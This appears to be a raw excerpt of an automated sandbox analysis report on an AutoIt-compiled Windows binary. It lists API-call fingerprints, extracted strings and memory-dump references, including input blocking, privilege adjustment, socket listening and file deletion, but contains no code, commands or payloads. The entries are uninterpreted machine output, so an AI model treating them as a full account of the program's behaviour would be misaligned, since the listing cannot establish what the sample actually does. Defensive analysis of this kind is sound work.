                                                                                                                    Similarity
                                                                                                                    • API ID: AllocHeap
                                                                                                                    • String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CursorMenuPopupTrack$ParentProc
                                                                                                                    • String ID: @GUI_DRAGID$F
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyIconImageLoadLongMessageObjectSendWindow
                                                                                                                    • String ID:
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$LongMenuText$CharInfoItemNextwsprintf
                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$Menu$Item$EnableInfoMove$DefaultShow$DrawFocusLongRect
                                                                                                                    • String ID: P
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: A$AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$ImageList_Window$DeleteMessageObjectSend$IconMove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3372153169-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$StationWindow$CloseCurrentHandleUser$CreateDuplicate$BlockDesktopEnvironmentHeapOpenProfileToken$AdjustAllocDestroyErrorLastLoadLogonLookupPrivilegePrivilegesThreadUnloadValuewcscpy
                                                                                                                    • String ID: default$winsta0$winsta0\default
                                                                                                                    • API String ID: 3202303201-1423368268
                                                                                                                    Similarity
                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2880407647-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3222323430-0
                                                                                                                    Similarity
                                                                                                                    • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215588206-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                    • API String ID: 281475176-2761157908
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseValue$ConnectCreateRegistry
                                                                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                    • API String ID: 3314541760-966354055
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P
                                                                                                                    • API String ID: 0-3110715001
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$ByteCharMultiWide_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                    • String ID: -$:$:$?
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst
                                                                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString
                                                                                                                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                    • String ID: *.*
                                                                                                                    Similarity
                                                                                                                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                                                                                    Similarity
                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    Similarity
                                                                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$Delete$AttributesCloseCopyFirstFullMoveNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 540024437-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 2649000838-1173974218
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1239891234-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1413079979-0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                                                                    • API String ID: 0-2187161917
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4170576061-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4210589936-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 3769357847-24824748
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _handle_error
                                                                                                                    • String ID: !$VUUU$fmod
                                                                                                                    • API String ID: 1757819995-2579133210
                                                                                                                    APIs
                                                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7BB822D60
                                                                                                                      • Part of subcall function 00007FF7BB81B184: GetCurrentProcess.KERNEL32(00007FF7BB81B21D), ref: 00007FF7BB81B1B1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                    • String ID: *$.$.
                                                                                                                    • API String ID: 2518042432-2112782162
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1286766494-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 33631002-4108050209
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 2163645468-3733053543
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7BB805C43
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                    • API String ID: 389471666-631824599
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                    • API String ID: 2574300362-192647395
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID: Variable must be of type 'Object'.
                                                                                                                    • API String ID: 1385522511-109567571
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1083639309-0
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: Init_thread_footer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1385522511-0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $[$\
                                                                                                                    • API String ID: 0-3681541464
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy_s
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1502251526-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3541575487-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1766415185-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2278415577-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3429775523-0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .
                                                                                                                    • API String ID: 0-248832578
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 599397726-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2295610775-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3479602957-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 81990902-0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: a/p$am/pm
                                                                                                                    • API String ID: 0-3206640213
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0$0x%p
                                                                                                                    • API String ID: 3215553584-2479247192
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Variable is not of type 'Object'.
                                                                                                                    • API String ID: 0-1840281001
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: no error
                                                                                                                    • API String ID: 0-1106124726
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 481472006-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: InputSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3431551938-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: mouse_event
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2434400541-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: BlockInput
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3456056419-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: NameUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2645101109-0
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3215553584-4108050209
                                                                                                                    Similarity
                                                                                                                    • API ID: Concurrency::cancel_current_task
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 118556049-0
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3215553584-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1996641542-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 698492251-1918224756
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                    • String ID: @
                                                                                                                    • API String ID: 3869813825-2766056989
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreenwcscat
                                                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                    • API String ID: 2091158083-3440237614
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$BuffCharDriveLowerType
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1600147383-4113822522
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                    • API String ID: 2610073882-3931177956
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Filewcscat$DeleteTemp$NamePath_fread_nolock_invalid_parameter_noinfowcscpy
                                                                                                                    • String ID: aut
                                                                                                                    • API String ID: 130057722-3010740371
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopRect
                                                                                                                    • String ID: tooltips_class32
                                                                                                                    • API String ID: 2443926738-1918224756
                                                                                                                    • Opcode ID: aaeb60d555cc86bf3e66e764e60d0e4162c92bacd9f6913f3df39f71d352b9df
